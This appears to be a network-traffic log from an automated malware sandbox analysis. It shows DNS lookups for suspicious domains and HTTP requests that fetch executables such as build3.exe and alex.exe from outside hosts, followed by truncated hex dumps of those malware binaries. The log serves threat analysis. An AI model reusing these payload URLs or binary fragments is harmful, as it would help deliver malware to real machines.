Dec 20, 2023 15:35:25.132744074 CET	1.1.1.1	192.168.2.4	0xdfcc	No error (0)	api.gofile.io		51.178.66.33	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:25.978271008 CET	1.1.1.1	192.168.2.4	0xffe2	No error (0)	geolocation-db.com		159.89.102.253	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:28.067667007 CET	1.1.1.1	192.168.2.4	0x8a8c	No error (0)	discord.com		162.159.136.232	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:28.067667007 CET	1.1.1.1	192.168.2.4	0x8a8c	No error (0)	discord.com		162.159.135.232	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:28.067667007 CET	1.1.1.1	192.168.2.4	0x8a8c	No error (0)	discord.com		162.159.137.232	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:28.067667007 CET	1.1.1.1	192.168.2.4	0x8a8c	No error (0)	discord.com		162.159.138.232	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:28.067667007 CET	1.1.1.1	192.168.2.4	0x8a8c	No error (0)	discord.com		162.159.128.233	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:28.260390043 CET	1.1.1.1	192.168.2.4	0xbf33	No error (0)	zexeq.com		179.153.102.52	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:28.260390043 CET	1.1.1.1	192.168.2.4	0xbf33	No error (0)	zexeq.com		196.188.169.138	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:28.260390043 CET	1.1.1.1	192.168.2.4	0xbf33	No error (0)	zexeq.com		95.86.30.3	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:28.260390043 CET	1.1.1.1	192.168.2.4	0xbf33	No error (0)	zexeq.com		190.12.87.61	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:28.260390043 CET	1.1.1.1	192.168.2.4	0xbf33	No error (0)	zexeq.com		211.119.84.111	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:28.260390043 CET	1.1.1.1	192.168.2.4	0xbf33	No error (0)	zexeq.com		93.112.218.34	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:28.260390043 CET	1.1.1.1	192.168.2.4	0xbf33	No error (0)	zexeq.com		91.104.83.7	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:28.260390043 CET	1.1.1.1	192.168.2.4	0xbf33	No error (0)	zexeq.com		210.182.29.70	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:28.260390043 CET	1.1.1.1	192.168.2.4	0xbf33	No error (0)	zexeq.com		187.156.96.226	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:28.260390043 CET	1.1.1.1	192.168.2.4	0xbf33	No error (0)	zexeq.com		211.119.84.112	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:32.795768023 CET	1.1.1.1	192.168.2.4	0x2ba5	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:43.114378929 CET	1.1.1.1	192.168.2.4	0x499c	No error (0)	www.magssin.com		167.86.119.6	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:36:29.110261917 CET	1.1.1.1	192.168.2.4	0x4cc7	Name error (3)	www.donaldview.net	none	none	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:37:20.722543955 CET	1.1.1.1	192.168.2.4	0xbc6b	No error (0)	comediantes.org		162.241.217.120	A (IP address)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2023 15:34:59.491424084 CET	95	OUT	GET /_errorpages/spfasiazx.exe HTTP/1.1 Host: china.dhabigroup.top Connection: Keep-Alive
Dec 20, 2023 15:34:59.720406055 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 20 Dec 2023 14:34:59 GMT Content-Type: application/octet-stream Content-Length: 661504 Connection: keep-alive Last-Modified: Wed, 20 Dec 2023 10:51:23 GMT ETag: "a1800-60ceec397c907" Cache-Control: max-age=14400 CF-Cache-Status: REVALIDATED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nBw%2FhE3oPeKGRu1%2FDVIBAMwKJLHUm9qkrH%2BckF8RpoWk1daR54NyAvq1ZIRlg3hWfRb0wdDCYLTipgJvgo4mu40O%2BIjQbJcSpizizaVef6DqPIqJoaxeda2%2BcxGR%2F5GVCHcBN41%2BzQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83889bfa2e42749e-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 aa c6 82 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 0c 0a 00 00 0a 00 00 00 00 00 00 0e 2a 0a 00 00 20 00 00 00 40 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bb 29 0a 00 4f 00 00 00 00 40 0a 00 1c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0a 00 0c 00 00 00 68 12 0a 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 0a 0a 00 00 20 00 00 00 0c 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 1c 06 00 00 00 40 0a 00 00 08 00 00 00 0e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0a 00 00 02 00 00 00 16 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ef 29 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 8c 88 00 00 8c 26 04 00 03 00 00 00 1c 00 00 06 18 af 04 00 50 63 05 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELe0* @@ @)O@`hT H.text `.rsrc@@@.reloc`@B)H&Pc
Dec 20, 2023 15:34:59.720422029 CET	1286	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9e 02 72 01 00 00 70 73 14 00 00 0a 7d 01 00 00 04 02 14 7d 02 00 00 04 02 28 15 00 00 0a 00 00 02 28 0a 00 00 06 00 2a 13 30 02 00 57 00 00 00 01 00 00 11 Data Ascii: rps}}((0W{orp{sosso&{o{o&(0{{ooo rpo!o"o#
Dec 20, 2023 15:34:59.720442057 CET	1286	IN	Data Raw: 7d 24 00 00 04 02 73 30 00 00 0a 7d 25 00 00 04 02 73 30 00 00 0a 7d 26 00 00 04 02 73 30 00 00 0a 7d 27 00 00 04 02 7b 03 00 00 04 6f 31 00 00 0a 00 02 7b 0a 00 00 04 6f 31 00 00 0a 00 02 7b 0b 00 00 04 6f 32 00 00 0a 00 02 7b 0c 00 00 04 6f 31 Data Ascii: }$s0}%s0}&s0}'{o1{o1{o2{o1{#o1(1{o3G%{%{%{o4{s5o6{rJpo7{ s8o9{o:{rJpo$
Dec 20, 2023 15:34:59.720454931 CET	1286	IN	Data Raw: 00 00 0a 00 02 7b 2c 00 00 04 72 06 01 00 70 6f 4b 00 00 0a 00 02 7b 2c 00 00 04 72 ba 03 00 70 6f 4c 00 00 0a 00 02 7b 2c 00 00 04 72 06 01 00 70 6f 4d 00 00 0a 00 02 7b 2d 00 00 04 72 38 01 00 70 6f 4b 00 00 0a 00 02 7b 2d 00 00 04 72 d6 03 00 Data Ascii: {,rpoK{,rpoL{,rpoM{-r8poK{-rpoL{-r8poM{.r.poK{.rpoL{.r.poM{/r"poK{/rpoL{/r"poM{0rpoK{0rpoL
Dec 20, 2023 15:34:59.720536947 CET	1286	IN	Data Raw: 00 00 0a 6f 39 00 00 0a 00 02 7b 10 00 00 04 1f 20 6f 3a 00 00 0a 00 02 7b 11 00 00 04 20 b0 01 00 00 1f 6a 73 35 00 00 0a 6f 36 00 00 0a 00 02 7b 11 00 00 04 72 d0 04 00 70 6f 37 00 00 0a 00 02 7b 11 00 00 04 20 a9 00 00 00 1f 14 73 38 00 00 0a Data Ascii: o9{ o:{ js5o6{rpo7{ s8o9{o:{ Ps5o6{rpo7{ s8o9{o:{ 6s5o6{rpo7{ s8o9
Dec 20, 2023 15:34:59.720598936 CET	1286	IN	Data Raw: 7b 1f 00 00 04 17 6f 52 00 00 0a 00 02 7b 1f 00 00 04 1f 12 1f 6d 73 35 00 00 0a 6f 36 00 00 0a 00 02 7b 1f 00 00 04 72 00 06 00 70 6f 37 00 00 0a 00 02 7b 1f 00 00 04 1f 20 1f 0d 73 38 00 00 0a 6f 39 00 00 0a 00 02 7b 1f 00 00 04 1f 11 6f 3a 00 Data Ascii: {oR{ms5o6{rpo7{ s8o9{o:{rpo${ oR{ Ss5o6{ rpo7{ Ls8o9{ o:{ rpo${!oR{!9s5o6{!
Dec 20, 2023 15:34:59.720685005 CET	1286	IN	Data Raw: 1b 28 68 00 00 0a 6f 69 00 00 0a 00 06 72 6e 07 00 70 6f 6a 00 00 0a 00 06 02 6f 6b 00 00 0a 17 fe 01 0b 07 2c 09 00 06 6f 6c 00 00 0a 0c 00 2a 13 30 02 00 38 00 00 00 05 00 00 11 00 73 6d 00 00 0a 0a 06 1b 28 68 00 00 0a 6f 69 00 00 0a 00 06 72 Data Ascii: (hoirnpojok,ol08sm(hoirnpojok,ol&(nf{5{Sooopf{6{Tooop(q(q(q(q*0%(r
Dec 20, 2023 15:34:59.720704079 CET	1286	IN	Data Raw: a2 25 1f 0a 02 7b 4a 00 00 04 a2 6f 34 00 00 0a 00 02 7b 43 00 00 04 28 7b 00 00 0a 6f 56 00 00 0a 00 02 7b 43 00 00 04 72 f0 07 00 70 6f 3c 00 00 0a 00 02 7b 43 00 00 04 1f 25 1f 14 73 38 00 00 0a 6f 3d 00 00 0a 00 02 7b 43 00 00 04 72 02 08 00 Data Ascii: %{Jo4{C({oV{Crpo<{C%s8o={Crpo>{9rpo<{9 s8o={Gr6po<{G s8o={Grfpo>{Gs?o@{:rxpo<{: s8
Dec 20, 2023 15:34:59.720725060 CET	1286	IN	Data Raw: 00 02 7b 57 00 00 04 72 22 0b 00 70 6f 3c 00 00 0a 00 02 7b 57 00 00 04 1f 44 1f 14 73 38 00 00 0a 6f 3d 00 00 0a 00 02 7b 57 00 00 04 72 3a 0b 00 70 6f 3e 00 00 0a 00 02 7b 58 00 00 04 72 4c 0b 00 70 6f 3c 00 00 0a 00 02 7b 58 00 00 04 20 96 00 Data Ascii: {Wr"po<{WDs8o={Wr:po>{XrLpo<{X s8o={Xrpo>{Xs?o@{Yrpo<{Y s8o={Yrpo>{Ys?o@{Zrpo<{Z
Dec 20, 2023 15:34:59.720797062 CET	1286	IN	Data Raw: 7b 61 00 00 04 18 6f 80 00 00 0a 00 02 7b 61 00 00 04 06 72 f8 0e 00 70 6f 81 00 00 0a 74 6b 00 00 01 6f 82 00 00 0a 00 02 7b 61 00 00 04 28 83 00 00 0a 6f 56 00 00 0a 00 02 7b 61 00 00 04 72 2a 0f 00 70 6f 3c 00 00 0a 00 02 7b 61 00 00 04 1f 17 Data Ascii: {ao{arpotko{a(oV{ar*po<{as8o={arPpo>{as?o@{bo{brXpotko{b(oV{brpo<{bs8o={brp
Dec 20, 2023 15:34:59.720866919 CET	1286	IN	Data Raw: 04 28 83 00 00 0a 6f 56 00 00 0a 00 02 7b 49 00 00 04 72 96 13 00 70 6f 3c 00 00 0a 00 02 7b 49 00 00 04 20 92 00 00 00 1f 16 73 38 00 00 0a 6f 3d 00 00 0a 00 02 7b 49 00 00 04 72 d2 13 00 70 6f 3e 00 00 0a 00 02 7b 4c 00 00 04 06 72 f0 13 00 70 Data Ascii: (oV{Irpo<{I s8o={Irpo>{Lrpotko{L(oV{Lr(po<{L Zo\|{L s8o={LrTpo>{Mr`potko{M(oV{Mr

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2023 15:35:01.810089111 CET	74	OUT	GET /build3.exe HTTP/1.1 Host: 185.172.128.19 Connection: Keep-Alive
Dec 20, 2023 15:35:02.111840963 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 20 Dec 2023 14:35:01 GMT Content-Type: application/octet-stream Content-Length: 428544 Last-Modified: Tue, 19 Dec 2023 16:39:55 GMT Connection: keep-alive ETag: "6581c75b-68a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 77 44 fe d8 33 25 90 8b 33 25 90 8b 33 25 90 8b 68 4d 93 8a 3d 25 90 8b 68 4d 95 8a ad 25 90 8b 68 4d 94 8a 20 25 90 8b e6 48 94 8a 21 25 90 8b e6 48 93 8a 27 25 90 8b e6 48 95 8a 46 25 90 8b 68 4d 91 8a 22 25 90 8b 33 25 91 8b e3 25 90 8b a8 4b 99 8a 32 25 90 8b a8 4b 6f 8b 32 25 90 8b a8 4b 92 8a 32 25 90 8b 52 69 63 68 33 25 90 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ab 20 4d 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ec 04 00 00 ae 01 00 00 00 00 00 d9 d9 01 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 05 06 00 78 00 00 00 00 70 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 06 00 ac 4c 00 00 50 94 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c 95 05 00 18 00 00 00 88 94 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 ac 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1a ea 04 00 00 10 00 00 00 ec 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 14 01 00 00 00 05 00 00 16 01 00 00 f0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f4 46 00 00 00 20 06 00 00 34 00 00 00 06 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 70 06 00 00 02 00 00 00 3a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 4c 00 00 00 80 06 00 00 4e 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$wD3%3%3%hM=%hM%hM %H!%H'%HF%hM"%3%%K2%Ko2%K2%Rich3%PEL Me@@DxpLP8,@.text `.rdata@@.dataF 4@.rsrcp:@@.relocLN<@B
Dec 20, 2023 15:35:02.111886024 CET	1286	IN	Data Raw: 00 00 00 00 00 68 70 c2 44 00 e8 39 c7 01 00 59 c3 cc cc cc cc 68 10 c2 44 00 e8 29 c7 01 00 59 c3 cc cc cc cc 6a 20 68 50 82 45 00 b9 20 2c 46 00 e8 4f 75 01 00 68 d0 c2 44 00 e8 08 c7 01 00 59 c3 cc cc cc 6a 20 68 74 82 45 00 b9 50 32 46 00 e8 Data Ascii: hpD9YhD)Yj hPE ,FOuhDYj htEP2F/uh0DYjhE2FuhDYj hE@-FthDYjhE2FthPDYjhEH+FthDhYjh[E2F
Dec 20, 2023 15:35:02.111957073 CET	1286	IN	Data Raw: 04 68 bc 85 45 00 b9 08 2f 46 00 e8 6f 70 01 00 68 70 d1 44 00 e8 28 c2 01 00 59 c3 cc cc cc 6a 04 68 c4 85 45 00 b9 a0 30 46 00 e8 4f 70 01 00 68 d0 d1 44 00 e8 08 c2 01 00 59 c3 cc cc cc 6a 04 68 cc 85 45 00 b9 b0 2f 46 00 e8 2f 70 01 00 68 30 Data Ascii: hE/FophpD(YjhE0FOphDYjhE/F/ph0DYjhE5FphDYjhEH1FohDYjhE5FohPDYjhE2FohDhYjhE*Foh
Dec 20, 2023 15:35:02.112005949 CET	1286	IN	Data Raw: b9 a8 2e 46 00 e8 6f 6b 01 00 68 70 e0 44 00 e8 28 bd 01 00 59 c3 cc cc cc 6a 08 68 dc 87 45 00 b9 58 30 46 00 e8 4f 6b 01 00 68 d0 e0 44 00 e8 08 bd 01 00 59 c3 cc cc cc 6a 08 68 e8 87 45 00 b9 48 34 46 00 e8 2f 6b 01 00 68 30 e1 44 00 e8 e8 bc Data Ascii: .FokhpD(YjhEX0FOkhDYjhEH4F/kh0DYjhE.FkhDYjhE5FjhDYjhE6FjhPDYjh$E3FjhDhYj@h0E-FjhDH
Dec 20, 2023 15:35:02.112076998 CET	1286	IN	Data Raw: 6f 66 01 00 68 70 ef 44 00 e8 28 b8 01 00 59 c3 cc cc cc 6a 04 68 3c 8c 45 00 b9 38 35 46 00 e8 4f 66 01 00 68 d0 ef 44 00 e8 08 b8 01 00 59 c3 cc cc cc 6a 04 68 44 8c 45 00 b9 70 33 46 00 e8 2f 66 01 00 68 30 f0 44 00 e8 e8 b7 01 00 59 c3 cc cc Data Ascii: ofhpD(Yjh<E85FOfhDYjhDEp3F/fh0DYjhLE+FfhDYjhTEx+FehDYjhhEh2FehPDYjhpE2FehDhYj hE3FehDHY
Dec 20, 2023 15:35:02.112121105 CET	1286	IN	Data Raw: 83 c4 08 8b c6 5e 5d c2 04 00 cc cc cc 8d 41 04 c7 01 84 05 45 00 50 e8 d3 15 03 00 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 49 04 b8 2c 81 45 00 85 c9 0f 45 c1 c3 cc cc 55 8b ec 56 8b f1 8d 46 04 c7 06 84 05 45 00 50 e8 9d 15 03 00 Data Ascii: ^]AEPYI,EEUVFEPEtjV^]WfAA@EdEQYUVuV8^]UVuWVf*V3^]Ujh
Dec 20, 2023 15:35:02.112190962 CET	1286	IN	Data Raw: 10 72 28 8b 4d 98 42 8b c1 81 fa 00 10 00 00 72 10 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 77 43 52 51 e8 17 ae 01 00 83 c4 08 8b 4b 08 8b c7 89 4f 0c 8b 4b 0c c7 07 7c 06 45 00 89 4f 10 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 8b 4d ec 33 cd e8 Data Ascii: r(MBrI#+wCRQKOK\|EOMdY_^M3r][CCUVFEP]EtjV^]UjhhDdPV F3PEdujh[EMuEEEq
Dec 20, 2023 15:35:02.112273932 CET	1286	IN	Data Raw: 4d f4 64 89 0d 00 00 00 00 59 8b 4d f0 33 cd e8 ae a2 01 00 8b e5 5d c3 e8 54 89 01 00 83 c4 04 84 c0 75 05 e8 9f 91 01 00 83 ec 08 8d 45 e8 8b cc 50 e8 5a f6 ff ff e8 a5 f6 ff ff cc cc cc cc cc 56 83 ce ff f0 0f c1 71 04 4e 75 05 8b 11 ff 52 04 Data Ascii: MdYM3]TuEPZVqNuR^tjUEVEtjV^]UEVEFFPEFOF4jPFdFh^]V
Dec 20, 2023 15:35:02.112359047 CET	1286	IN	Data Raw: 46 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b 75 08 89 75 08 c7 45 fc 00 00 00 00 8b ce 8b 06 ff 50 04 8b 06 8b ce 6a 01 ff 10 8b 4d f4 64 89 0d 00 00 00 00 59 5e 8b e5 5d c3 cc 55 8b ec f6 45 08 01 56 8b f1 c7 06 b4 93 45 00 74 0b 6a 04 56 e8 de Data Ascii: F3PEduuEPjMdY^]UEVEtjV^]UjhDdP F3EVWPEdW~(fEW}EuPEE~d}WVMu5~d\|WEu!Md
Dec 20, 2023 15:35:02.112420082 CET	1286	IN	Data Raw: cc cc cc cc cc 55 8b ec 6a ff 68 c0 89 44 00 64 a1 00 00 00 00 50 56 a1 14 20 46 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 8b 06 85 c0 75 0b e8 53 7b 01 00 cc e8 70 7f 01 00 8b 46 10 85 c0 74 41 8b 4e 18 2b c8 83 e1 fc 81 f9 00 10 00 00 72 12 Data Ascii: UjhDdPV F3PEduS{pFtAN+rP#+w=QPFFFFP~MdY^]X4UQVAujVMFPUSMW{;
Dec 20, 2023 15:35:02.413436890 CET	1286	IN	Data Raw: 4e 04 33 c0 83 f9 04 0f 94 c0 40 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 8b 75 ec 8b ce e8 38 02 00 00 84 c0 75 24 8d 45 e8 50 e8 6b e7 ff ff 83 c4 04 50 8b ce c6 45 fc 02 e8 2c 00 00 00 8d 4d e8 c6 45 fc 01 e8 20 e7 ff ff 8d 4e 0c Data Ascii: N3@MdY_^[]u8u$EPkPE,ME N<A<5UjhZDdP8SVW F3PEdME33EEE3EE]uE;t1+MVC]WuS!E4

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2023 15:35:04.556936979 CET	70	OUT	GET /alex.exe HTTP/1.1 Host: 91.92.253.29 Connection: Keep-Alive
Dec 20, 2023 15:35:04.808190107 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 20 Dec 2023 14:35:04 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Tue, 19 Dec 2023 06:26:54 GMT ETag: "e8400-60cd6f3e6f9d3" Accept-Ranges: bytes Content-Length: 951296 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 77 50 46 af 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 78 0e 00 00 0a 00 00 00 00 00 00 4a 97 0e 00 00 20 00 00 00 a0 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f6 96 0e 00 4f 00 00 00 00 a0 0e 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0e 00 0c 00 00 00 04 80 0e 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 77 0e 00 00 20 00 00 00 78 0e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 38 06 00 00 00 a0 0e 00 00 08 00 00 00 7a 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0e 00 00 02 00 00 00 82 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 97 0e 00 00 00 00 00 48 00 00 00 02 00 05 00 5c 5c 00 00 f8 1a 04 00 03 00 00 00 38 00 00 06 54 77 04 00 b0 08 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 2a 00 13 30 02 00 31 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 15 00 00 0a 17 fe 01 0a 06 2c 1e 00 7e 01 00 00 04 6f 16 00 00 0a 00 7e 01 00 00 04 6f 17 00 00 0a 00 14 80 01 00 00 04 00 2a 00 00 00 13 30 03 00 51 00 00 00 02 00 00 11 00 02 7e 01 00 00 04 73 18 00 00 0a 0a 06 02 7e 01 00 00 04 73 19 00 00 0a 6f 1a 00 00 0a 00 06 6f 1b 00 00 0a 7e 01 00 00 04 6f 1c 00 00 0a 00 06 6f 1b 00 00 0a 02 6f 1d 00 00 0a 00 73 1e 00 00 0a 0b 06 07 6f 1f 00 00 0a 26 07 0c 2b 00 08 2a 0a 00 2a 0a 00 2a 00 13 30 01 00 07 00 00 00 01 00 00 11 00 17 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 03 00 00 11 00 72 01 00 00 70 0a 2b 00 06 2a 0a 00 2a 00 00 13 30 01 00 07 00 00 00 01 00 00 11 00 16 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 03 00 00 11 00 72 01 00 00 70 0a 2b 00 06 2a 22 02 28 20 00 00 0a 00 2a 5e 02 14 7d 03 00 00 04 02 28 21 00 00 0a 00 00 02 28 14 00 00 06 00 2a 0a 00 2a 0a 00 2a 00 00 13 30 01 00 0f 00 00 00 04 00 00 11 00 73 15 00 00 06 0a 06 6f 22 00 00 0a 26 2a 26 00 02 28 23 00 00 0a 00 2a 0a 00 2a 0a 00 2a 00 13 30 02 00 2b 00 00 00 01 00 00 11 00 03 2c 0b 02 7b 03 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELwPF0xJ @ @O8p H.textPw x `.rsrc8z@@.reloc@BH\\8Tw01~o,~o~o0Q~s~soo~oooso&+*0+0rp+*0+0rp+"( ^}(!(**0so"&&(#***0+,{
Dec 20, 2023 15:35:04.808221102 CET	1286	IN	Data Raw: 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 03 00 00 04 6f 24 00 00 0a 00 00 02 03 28 25 00 00 0a 00 2a 00 13 30 05 00 81 06 00 00 05 00 00 11 00 d0 03 00 00 02 28 26 00 00 0a 73 27 00 00 0a 0a 02 73 28 00 00 0a 7d 04 00 00 04 02 73 28 00 00 0a 7d Data Ascii: +,{o$(%0(&s's(}s(}s(}s(}s(}s(}s(}s(}s(}s(}s(}s(}s(}s(}s)}{o(
